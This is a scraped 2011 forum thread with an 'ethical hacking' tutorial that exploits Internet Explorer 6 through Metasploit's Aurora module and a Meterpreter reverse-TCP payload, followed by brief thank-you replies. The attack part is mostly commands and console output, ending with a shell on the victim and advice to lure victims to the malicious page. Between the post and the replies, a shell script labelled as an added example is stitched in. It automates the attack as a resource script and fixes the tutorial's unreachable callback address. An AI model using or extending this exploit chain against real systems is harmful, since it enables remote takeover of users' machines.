Go4Expert (http://www.go4expert.com/)
Ethical hacking Tips: Client Side Exploitation Using Metasploit (http://www.go4expert.com/articles/client-exploitation-using-metasploit-t26428/)

lionaneesh 2Aug2011 20:39

Client Side Exploitation Using Metasploit
 
In this tutorial we’ll be learning how to perform a basic client-side exploitation using Metasploit. Note that this tutorial is made for educational purposes only, to help you understand how such vulnerabilities can be exploited.

Client Side Attacks

Client-side attacks are a special type of attack that mainly target client-side applications, e.g. web browsers, download clients, etc. They differ from server-side attacks: instead of targeting vulnerabilities in server-side applications such as a web server, they target the client-side application itself.

To demonstrate this attack we’ll be using the Metasploit Framework and one of its basic client-side exploits.

Lab Setup

The lab consists of a victim and an attacker machine.

Code:

+++++++++++++++++++                  +++++++++++++++++++++
+ Attacker        +  ================ + Victim Machine    +
+                +    Behind NAT    +                  +
+++++++++++++++++++                  +++++++++++++++++++++

Victim

The victim machine is running an unpatched Windows XP SP1 with Internet Explorer 6, which has a client-side vulnerability.

Attacker

The attacker’s machine is running BackTrack 5 with Metasploit installed.

I am using virtual machines to set up my lab, and the network type is set to NAT.

Now that we have set up our lab, let the hacking begin.

Exploitation

First, let’s open up the Metasploit console using ‘msfconsole’:

Code:

  root@bt:~# msfconsole
 
                  __.                      .__.        .__. __.
    _____  _____/  |______    ____________ |  |  ____ |__|/  |_
  /    \_/ __ \  __\__  \  /  ___/\____ \|  |  /  _ \|  \  __\
  |  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
  |__|_|  /\___  >__| (____  /____  >|  __/|____/\____/|__||__|
        \/    \/          \/    \/ |__|
 
 
        =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
  + -- --=[ 688 exploits - 357 auxiliary - 39 post
  + -- --=[ 217 payloads - 27 encoders - 8 nops
  msf >

Though Metasploit provides hundreds of exploits to exploit Internet Explorer 6, for this tutorial we’ll be using the Internet Explorer Aurora exploit.

To select this exploit in Metasploit, simply use the ‘use’ command:

Code:

  msf > use exploit/windows/browser/ms10_002_aurora
 
  msf exploit(ms10_002_aurora) >

Now let’s have a look at the options:
Code:

  msf exploit(ms10_002_aurora) > show options

  Module options (exploit/windows/browser/ms10_002_aurora):

     Name        Current Setting  Required  Description
     ----        ---------------  --------  -----------
     SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
     SRVPORT     8080             yes       The local port to listen on.
     SSL         false            no        Negotiate SSL for incoming connections
     SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
     URIPATH                      no        The URI to use for this exploit (default is random)


  Exploit target:

     Id  Name
     --  ----
     0   Automatic

Now let’s set them!
Code:

  msf exploit(ms10_002_aurora) > set SRVHOST 127.0.0.1
  SRVHOST => 127.0.0.1
  msf exploit(ms10_002_aurora) > set SRVPORT 80
  SRVPORT => 80
  msf exploit(ms10_002_aurora) > set URIPATH /
  URIPATH => /
  msf exploit(ms10_002_aurora) >

Above we set the server host to localhost, i.e. 127.0.0.1, the server port to 80 and the URI path to ‘/’ (root).

Now let’s set some payload options:
Code:

  msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf exploit(ms10_002_aurora) > show options

  Module options (exploit/windows/browser/ms10_002_aurora):

     Name        Current Setting  Required  Description
     ----        ---------------  --------  -----------
     SRVHOST     127.0.0.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
     SRVPORT     80               yes       The local port to listen on.
     SSL         false            no        Negotiate SSL for incoming connections
     SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
     URIPATH     /                no        The URI to use for this exploit (default is random)


  Payload options (windows/meterpreter/reverse_tcp):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  process          yes       Exit technique: seh, thread, process, none
     LHOST                      yes       The listen address
     LPORT     4444             yes       The listen port


  Exploit target:

     Id  Name
     --  ----
     0   Automatic


  msf exploit(ms10_002_aurora) > set LHOST 127.0.0.1
  LHOST => 127.0.0.1
  msf exploit(ms10_002_aurora) > set LPORT 31337
  LPORT => 31337
  msf exploit(ms10_002_aurora) >

Above we set the payload to windows/meterpreter/reverse_tcp, the listener address to localhost and the listener port to 31337.

Now that everything is set up, let’s launch the exploit:
Code:

  msf exploit(ms10_002_aurora) > exploit

  Exploit running as background job.
  Started reverse handler on 127.0.0.1:31337
  Using URL: http://127.0.0.1:80/
  Server started.

The malicious web page is now being served by our server (URL: http://127.0.0.1:80/). All you have to do is direct the victim to this web page, and if they are running an exploitable browser on Windows XP, they’ll get owned!

In this case I’ll use the vulnerable IE browser on the victim machine to view this site. Now see what happens:

Code:

  Sending stage (723456 bytes)

  Meterpreter session 1 opened (192.168.0.1:31337 -> 192.168.0.2:1514)

  msf exploit(ms10_002_aurora) > sessions -i 1

  Starting interaction with 1...

  meterpreter > getuid
  Server username: WINXP\VICTIM

We got a Meterpreter session. Now you can use it to execute any command on the system; the victim machine has been owned.

That’s all for this tutorial; stay tuned for more.
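The steps of the walkthrough above (select the module, set the server options, pick the payload, set the handler, launch) gathered into one msfconsole resource script, as an added example that is not part of the original post. The module, option and payload names are the ones shown in the walkthrough; the attacker address used in the usage line (192.168.0.1) is an assumption standing in for the attacker VM's address on the NAT network, as are the helper names. The check_lhost function refuses a loopback or wildcard LHOST, because the reverse shell inside the payload connects back to that address from the victim machine, so it has to be an address the victim can route to.

```shell
#!/bin/sh
# Added example, not from the original post: generate a msfconsole resource
# script (run it with `msfconsole -r aurora.rc`) that replays the steps of the
# walkthrough. Module, option and payload names are the ones shown above;
# the attacker address in the usage comment at the bottom is an assumption.
set -u

# Print the resource script for the ms10_002_aurora module.
# $1 = SRVHOST (address the exploit web server binds to)
# $2 = SRVPORT
# $3 = LHOST   (address the Meterpreter reverse shell connects back to)
# $4 = LPORT
# $5 = URIPATH (defaults to /, the site root, as in the walkthrough)
build_aurora_rc() {
  srvhost="$1"; srvport="$2"; lhost="$3"; lport="$4"; uripath="${5:-/}"
  cat <<EOF
use exploit/windows/browser/ms10_002_aurora
set SRVHOST ${srvhost}
set SRVPORT ${srvport}
set URIPATH ${uripath}
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ${lhost}
set LPORT ${lport}
exploit -j
EOF
}

# LHOST is embedded in the payload and the victim connects back to it, so a
# loopback or wildcard address means no session will ever arrive from a
# separate victim machine. Returns 0 when the address is usable, 1 otherwise.
check_lhost() {
  case "$1" in
    127.*|0.0.0.0|localhost|'') return 1 ;;
    *) return 0 ;;
  esac
}

# Wrap both steps: validate LHOST, write the script to $2 (or a temp file)
# and print its path. Uses the same address for SRVHOST and LHOST and the
# ports from the walkthrough (80 for the web server, 31337 for the handler).
# Returns 2 on a bad LHOST so the caller does not start msfconsole blind.
write_aurora_rc() {
  attacker="$1"
  check_lhost "$attacker" || {
    echo "LHOST $attacker is not reachable from a remote victim" >&2
    return 2
  }
  out="${2:-$(mktemp)}"
  build_aurora_rc "$attacker" 80 "$attacker" 31337 / > "$out"
  echo "$out"
}

# Usage (assumed lab address; substitute the attacker VM's NAT-network address):
#   rc=$(write_aurora_rc 192.168.0.1 aurora.rc) && msfconsole -r "$rc"
```

Both VMs in a NAT lab sit on the same virtual network, so the address to pass is the attacker VM's address on that network; an address that only the attacker machine itself can reach will serve the page to nobody and receive no callback.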

anilkamble 3Aug2011 17:15

Re: Client Side Exploitation Using Metasploit
 
Thanks for sharing this nice info with us.
Hoping for more from you.

lionaneesh 4Aug2011 10:33

Re: Client Side Exploitation Using Metasploit
 
Quote:

Originally Posted by anilkamble (Post 85690)
Thanks for sharing this nice info with us.
Hoping for more from you.

My Pleasure! :D

ManzZup 5Aug2011 23:14

Re: Client Side Exploitation Using Metasploit
 
Really nice one,
thanks for the share :D

lionaneesh 11Sep2011 19:18

Re: Client Side Exploitation Using Metasploit
 
Quote:

Originally Posted by ManzZup (Post 85776)
Really nice one,
thanks for the share :D

My Pleasure!
